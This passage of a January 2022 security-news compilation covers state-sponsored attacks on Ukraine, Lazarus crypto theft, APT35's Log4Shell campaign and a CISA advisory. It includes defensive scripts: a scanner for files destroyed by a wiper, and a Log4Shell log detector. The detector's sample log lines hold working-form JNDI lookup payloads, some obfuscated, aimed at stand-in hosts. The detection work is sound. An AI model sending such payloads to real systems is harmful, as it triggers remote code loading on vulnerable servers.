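            rel = os.path.relpath(path, root).replace(os.sep, "/")
            hits.append({"path": rel, "indicators": indicators})
    return sorted(hits, key=lambda h: h["path"])


def _write(root, rel, data):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def build_sample_tree(root, fill_len=2048):
    """Constructed fixture: two overwritten and renamed files (one large enough that
    its tail survived), one overwritten but not renamed, and clean files."""
    fill = bytes([FILL_BYTE]) * fill_len
    _write(root, "docs/report.docx.zq7k", fill)
    _write(root, "docs/notes.txt", b"meeting notes\n")
    _write(root, "media/clip.mp4", fill)
    _write(root, "media/big.bin.h3Xq", bytes([FILL_BYTE]) * HEAD_BYTES + b"original tail survives")
    _write(root, "data/config.json", b'{"enabled": true}\n')
    _write(root, "empty.log", b"")


def demo():
    """Build the constructed tree in a temporary directory, scan it and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for hit in demo():
        print(hit["path"], "->", ", ".join(hit["indicators"]))
```

The content check drives the verdict and the extension check only annotates it, because a rename is the cheaper trait to vary and a legitimate four-letter extension (config.json here) must not be reported on its own; conversely, clip.mp4 shows that a file can be destroyed without the telltale rename, which is why name-based hunting alone under-counts the damage.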
The malicious activity is "inconsistent" with cybercriminal ransomware activity for reasons that "explicit payment amounts and cryptocurrency wallet addresses are rarely specified in modern criminal ransom notes" and "the ransom note in this case does not include a custom ID," Microsoft said.
The development comes as numerous government websites in the Eastern European country were defaced on Friday with a message warning Ukrainians that their personal data was being uploaded to the Internet. The Security Service of Ukraine (SSU) said it found "signs" of involvement of hacking groups associated with the Russian intelligence services.
"Given the scale of the observed intrusions, MSTIC is not able to assess intent of the identified destructive actions but does believe these actions represent an elevated risk to any government agency, non-profit or enterprise located or with systems in Ukraine," the researchers cautioned.
However, Reuters earlier today raised the possibility that the attacks may have been the work of an espionage group linked to Belarusian intelligence that's tracked as UNC1151 and Ghostwriter. "Multiple significant intrusions into Ukrainian government entities have been conducted by UNC1151," cybersecurity firm Mandiant disclosed in a report in November 2021, describing the group's operations as aligned with Belarusian government interests.
Massive Cyber Attack Knocks Down Ukrainian Government Websites
19.1.2022 BigBrothers Thehackernews
No fewer than 70 websites operated by the Ukrainian government went offline on Friday for hours in what appears to be a coordinated cyber attack amid heightened tensions with Russia.
"As a result of a massive cyber attack, the websites of the Ministry of Foreign Affairs and a number of other government agencies are temporarily down," Oleg Nikolenko, MFA spokesperson, tweeted.
The Security Service of Ukraine, the country's law-enforcement authority, alluded to a possible Russian involvement, pointing fingers at the hacker groups associated with the Russian secret services while branding the intrusions as a supply chain attack that involved hacking the "infrastructure of a commercial company that had access to the rights to administer the web resources affected by the attack."
Prior to the update from the SSU, the Ukrainian CERT claimed that the attacks may have exploited a security vulnerability in Laravel-based October CMS (CVE-2021-32648), which could be abused by an adversary to gain access to an account using a specially crafted request.
The breach targeted a number of government websites, including those for Ukraine's Cabinet, education, agriculture, emergency, energy, veterans affairs, and environment ministries, among others, 10 websites of which were "subjected to unauthorized interference."
The security agency, however, stressed that content of the sites was not altered and that no sensitive personal data was stolen.
"Provocative messages were posted on the main page of the websites," the SSU said. "The content of the sites was not changed, and, according to preliminary information, no leakage of personal data occurred."
This is far from the first time Russia has set its sights on Ukraine. In December 2015, a nation-state adversary tracked as Sandworm targeted the power grid, resulting in unprecedented blackouts for roughly 230,000 consumers in the nation.
Two years later, Ukraine was also at the receiving end of the devastating NotPetya wiper malware campaign by the Sandworm military hackers that erased confidential data from the computers of banks and energy firms.
Then in November 2021, the SSU unmasked the real identities of five Russian intelligence officials allegedly involved in over 5,000 cyberattacks attributed to a cyber-espionage group named Gamaredon aimed at public authorities and critical infrastructure located in the country.
"The purpose of such attacks is to destabilize the internal situation in the country, as well as to sow chaos and disbelief in society," the Center for Strategic Communications and Information Security said, noting the hacks amount to "psychological pressure and intimidation."
North Korean Hackers Stole Millions from Cryptocurrency Startups Worldwide
19.1.2022 BigBrothers Thehackernews
Operators associated with the Lazarus sub-group BlueNoroff have been linked to a series of cyberattacks targeting small and medium-sized companies worldwide with an aim to drain their cryptocurrency funds, in what's yet another financially motivated operation mounted by the prolific North Korean state-sponsored actor.
Russian cybersecurity company Kaspersky, which is tracking the intrusions under the name "SnatchCrypto," noted that the campaign has been running since at least 2017, adding that the attacks are aimed at startups in the FinTech sector located in China, Hong Kong, India, Poland, Russia, Singapore, Slovenia, the Czech Republic, the U.A.E., the U.S., Ukraine, and Vietnam.
"The attackers have been subtly abusing the trust of the employees working at targeted companies by sending them a full-featured Windows backdoor with surveillance functions, disguised as a contract or another business file," the researchers said. "In order to eventually empty the victim's crypto wallet, the actor has developed extensive and dangerous resources: complex infrastructure, exploits and malware implants."
BlueNoroff, and the larger Lazarus umbrella, are known for deploying a diverse arsenal of malware in multi-pronged assaults on businesses, relying on a mix of advanced phishing tactics and sophisticated malware to illicitly procure funds for the sanctions-hit North Korean regime and generate revenue for its nuclear weapons and ballistic missile programs.
If anything, these cyber offensives are paying off big time. According to a new report published by blockchain analytics firm Chainalysis, the Lazarus Group has been linked to seven attacks on cryptocurrency platforms that extracted almost $400 million worth of digital assets in 2021 alone, up from $300 million in 2020.
"These attacks targeted primarily investment firms and centralized exchanges [...] to siphon funds out of these organizations' internet-connected 'hot' wallets into DPRK-controlled addresses," the researchers said. "Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out" through mixers to obscure the trail.
Documented malicious activity involving the nation-state actor has taken the form of cyber-enabled heists against foreign financial institutions, notably the SWIFT banking network hacks in 2015-2016, with recent campaigns resulting in the deployment of a backdoor called AppleJeus that poses as a cryptocurrency trading platform to plunder and transfer money to their accounts.
The SnatchCrypto attacks are no different in that they are part of the actor's efforts focused on "stalking and studying" cryptocurrency firms by concocting elaborate social engineering schemes to build trust with their targets by posing as legitimate venture capitalist firms, only to bait the victims into opening malware-laced documents that retrieve a payload designed to run a malicious executable received over an encrypted channel from a remote server.
An alternative method used to trigger the infection chain is the use of Windows shortcut files (".LNK") to fetch the next-stage malware, a Visual Basic Script, that then acts as a jump-off point to execute a series of intermediary payloads, before installing a full-featured backdoor that comes with "enriched" capabilities to capture screenshots, record keystrokes, steal data from the Chrome browser, and execute arbitrary commands.
The ultimate goal of the attacks, however, is to monitor financial transactions of the compromised users and steal cryptocurrency. Should a potential target use a Chrome extension like Metamask to manage crypto wallets, the adversary stealthily moves to locally replace the main component of the extension with a fake version that alerts the operators every time a large transfer is kicked off to another account.
In the final phase, the funds are subsequently diverted by performing a malicious code injection to intercept and modify the transaction details on demand. "The attackers modify not only the recipient [wallet] address, but also push the amount of currency to the limit, essentially draining the account in one move," the researchers explained.
"Cryptocurrency is a heavily targeted sector when it comes to cybercrime due to the decentralized nature of the currencies and the fact that, unlike with credit card or bank transfers, the transaction happens quickly and is impossible to reverse," Erich Kron, security awareness advocate at KnowBe4, said in a statement.
"Nation-states, especially those under strict tariffs or other financial restrictions, can benefit greatly by stealing and manipulating cryptocurrency. Many times, a cryptocurrency wallet can contain multiple types of cryptocurrency, making them a very appealing target," Kron added.
Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell Backdoor
19.1.2022 BigBrothers Thehackernews
An Iranian state-sponsored actor has been observed scanning and attempting to abuse the Log4Shell flaw in publicly-exposed Java applications to deploy a hitherto undocumented PowerShell-based modular backdoor dubbed "CharmPower" for follow-on post-exploitation.
"The actor's attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations on previous infrastructure, which made the attack easier to detect and attribute," researchers from Check Point said in a report published this week.
The Israeli cybersecurity company linked the attack to a group known as APT35, which is also tracked using the codenames Charming Kitten, Phosphorus, and TA453, citing overlaps with toolsets previously identified as infrastructure used by the threat actor.
Log4Shell aka CVE-2021-44228 (CVSS score: 10.0) concerns a critical security vulnerability in the popular Log4j logging library that, if successfully exploited, could lead to remote execution of arbitrary code on compromised systems.
The ease of exploitation coupled with the widespread use of the Log4j library has created a vast pool of targets, even as the shortcoming has attracted swarms of bad actors, who have seized on the opportunity to stage a dizzying array of attacks since its public disclosure last month.
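Because exploitation of Log4Shell starts with a JNDI lookup string landing in a logged field (User-Agent, path, headers), the first defensive step is to hunt for such strings in web-server access logs. The following is an added example, not code from the article or from Check Point: it URL-decodes each line, collapses the `${lower:x}`/`${upper:x}` wrapper variants that appear in public detection rules, and reports lines containing a JNDI lookup. The log lines are constructed for the example and use documentation (RFC 5737) addresses.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article). The first three
# carry Log4Shell-style lookup strings in the User-Agent or path; the last is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jan/2022:10:01:22 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.7 - - [13/Jan/2022:10:01:23 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.9/x}"
203.0.113.7 - - [13/Jan/2022:10:01:24 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%7D HTTP/1.1" 404 0 "-" "curl/7.79"
198.51.100.20 - - [13/Jan/2022:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# ${lower:j} / ${upper:j} wrappers resolve to their inner text at lookup time,
# so collapsing them before matching catches the split-keyword variants.
NESTED = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(s: str) -> str:
    """URL-decode until stable, then collapse lower/upper wrappers until stable."""
    prev = None
    while prev != s:          # handles double-encoded payloads
        prev = s
        s = unquote(s)
    prev = None
    while prev != s:          # handles wrappers nested inside wrappers
        prev = s
        s = NESTED.sub(lambda m: m.group(1), s)
    return s


def find_jndi_lookups(log_text: str) -> list:
    """Return one dict per log line whose normalized form contains a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append({"line": n, "src": line.split(" ", 1)[0], "normalized": norm})
    return hits


if __name__ == "__main__":
    for h in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {h['line']} from {h['src']}: {h['normalized']}")
```

A hit here means a lookup string reached the log, not that the application was vulnerable; correlate the source with outbound LDAP/RMI/DNS connections from the Java host to confirm a successful trigger.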
While Microsoft previously pointed out APT35's efforts to acquire and modify the Log4j exploit, the latest findings show that the hacking group has operationalized the flaw to distribute the PowerShell implant capable of retrieving next-stage modules and exfiltrating data to a command-and-control (C2) server.
CharmPower's modules also support a variety of intelligence gathering functionality, including features to gather system information, list installed applications, take screenshots, enumerate running processes, execute commands sent from the C2 server, and clean up any signs of evidence created by these components.
The disclosure comes as Microsoft and the NHS cautioned that internet-facing systems running VMware Horizon are being targeted to deploy web shells and a new strain of ransomware called NightSky, with the tech giant connecting the latter to a China-based operator dubbed DEV-0401, which has also deployed LockFile, AtomSilo, and Rook ransomware in the past.
What's more, Hafnium, another threat actor group operating out of China, has also been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting, Microsoft noted.
"Judging by their ability to take advantage of the Log4j vulnerability and by the code pieces of the CharmPower backdoor, the actors are able to change gears rapidly and actively develop different implementations for each stage of their attacks," the researchers said.
US Cyber Command Links 'MuddyWater' Hacking Group to Iranian Intelligence
19.1.2022 BigBrothers Thehackernews
The U.S. Cyber Command (USCYBERCOM) on Wednesday officially confirmed MuddyWater's ties to the Iranian intelligence apparatus, while simultaneously detailing the various tools and tactics adopted by the espionage actor to burrow into victim networks.
"MuddyWater has been seen using a variety of techniques to maintain access to victim networks," USCYBERCOM's Cyber National Mission Force (CNMF) said in a statement. "These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions."
The agency characterized the hacking efforts as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), corroborating earlier reports about the nation-state actor's provenance.
Also tracked under the monikers Static Kitten, Seedworm, Mercury and TEMP.Zagros, MuddyWater is known for its attacks primarily directed against a wide gamut of entities in governments, academia, cryptocurrency, telecommunications, and oil sectors in the Middle East. The group is believed to have been active at least since 2017.
Recent intrusions mounted by the adversary have involved exploiting the ZeroLogon (CVE-2020-1472) vulnerability as well as leveraging remote desktop management tools such as ScreenConnect and Remote Utilities to deploy custom backdoors that could enable the attackers to gain unauthorized access to sensitive data.
Last month, Symantec's Threat Hunter Team publicized findings about a new wave of hacking activities unleashed by the Muddywater group against a string of telecom operators and IT companies throughout the Middle East and Asia during the previous six months using a blend of legitimate tools, publicly available malware, and living-off-the-land (LotL) methods.
Also incorporated into its toolset is a backdoor named Mori and a piece of malware called PowGoop, a DLL loader designed to decrypt and run a PowerShell-based script that establishes network communications with a remote server.
Malware samples attributed to the advanced persistent threat (APT) have been made available on the VirusTotal malware aggregation repository, which can be accessed here.
"Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques," SentinelOne researcher Amitai Ben Shushan Ehrlich said. "While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection."
FBI, NSA and CISA Warn of Russian Hackers Targeting Critical Infrastructure
19.1.2022 BigBrothers Thehackernews
Amid renewed tensions between the U.S. and Russia over Ukraine and Kazakhstan, American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.
To that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and exploiting known vulnerabilities to gain initial access to target networks.
The list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are "common but effective," is below:
CVE-2018-13379 (FortiGate VPNs)
CVE-2019-1653 (Cisco router)
CVE-2019-2725 (Oracle WebLogic Server)
CVE-2019-7609 (Kibana)
CVE-2019-9670 (Zimbra software)
CVE-2019-10149 (Exim Simple Mail Transfer Protocol)
CVE-2019-11510 (Pulse Secure)
CVE-2019-19781 (Citrix)
CVE-2020-0688 (Microsoft Exchange)
CVE-2020-4006 (VMWare)
CVE-2020-5902 (F5 Big-IP)
CVE-2020-14882 (Oracle WebLogic)
CVE-2021-26855 (Microsoft Exchange, exploited frequently alongside CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065)
"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware," the agencies said.
"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments including cloud environments by using legitimate credentials."
Russian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized SolarWinds Orion updates to breach the networks of U.S. government agencies.
To increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.
"Consider using a centralized patch management system," the advisory reads. "For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program."
Other recommended best practices are as follows:
Implement robust log collection and retention
Require accounts to have strong passwords
Enable strong spam filters to prevent phishing emails from reaching end-users
Implement rigorous configuration management programs
Disable all unnecessary ports and protocols
Ensure OT hardware is in read-only mode
North Korean Hackers Start New Year with Attacks on Russian Foreign Ministry
14.1.2022 BigBrothers Thehackernews
A North Korean cyberespionage group named Konni has been linked to a series of targeted attacks aimed at the Russian Federation's Ministry of Foreign Affairs (MID) with New Year lures to compromise Windows systems with malware.
"This activity cluster demonstrates the patient and persistent nature of advanced actors in waging multi-phased campaigns against perceived high-value networks," researchers from Lumen Technologies' Black Lotus Labs said in an analysis shared with The Hacker News.
The Konni group's tactics, techniques, and procedures (TTPs) are known to overlap with threat actors belonging to the broader Kimsuky umbrella, which is also tracked by the cybersecurity community under the monikers Velvet Chollima, ITG16, Black Banshee, and Thallium.
The most recent attacks involved the actor gaining access to the target networks through stolen credentials, exploiting the foothold to load malware for intelligence gathering purposes, with early signs of the activity documented by MalwareBytes as far back as July 2021.
Subsequent iterations of the phishing campaign are believed to have unfolded in three waves, the first commencing on October 19, 2021 to harvest credentials from MID personnel, followed by leveraging COVID-19 themed lures in November to install a rogue version of the Russian-mandated vaccination registration software that served as a loader for additional payloads.
"The timing of this activity closely aligned with the passage of Russian Vaccine Passport laws that mandated Russians had to receive a QR code from the government to prove vaccination in order to access public places such as restaurants and bars," the researchers noted.
The third attack, also corroborated by Cluster25 earlier this week, began on December 20, 2021, using New Year's Eve festivities as a spear-phishing theme to trigger a multi-stage infection chain that culminated in the installation of a remote access trojan named Konni RAT.
Specifically, the intrusions transpired by first compromising the email account belonging to a staff member of the MID, from which emails were sent to at least two other MID entities, including the Russian Embassy in Indonesia and Sergey Alexeyevich Ryabkov, a deputy minister overseeing non-proliferation and arms control.
The email missives seemingly propagated a "Happy New Year's" message, only to contain a trojanized screensaver attachment that's designed to retrieve and run next-stage executables from a remote server. The final stage of the attack is the deployment of the Konni RAT trojan, which conducts reconnaissance of the infected machine and exfiltrates the collected information back to the server.
"While this particular campaign was highly targeted, it is vital for defenders to understand the evolving capabilities of advanced actors to achieve infection of coveted targets," the researchers said, urging organizations to watch out for phishing emails and use multi-factor authentication to secure accounts.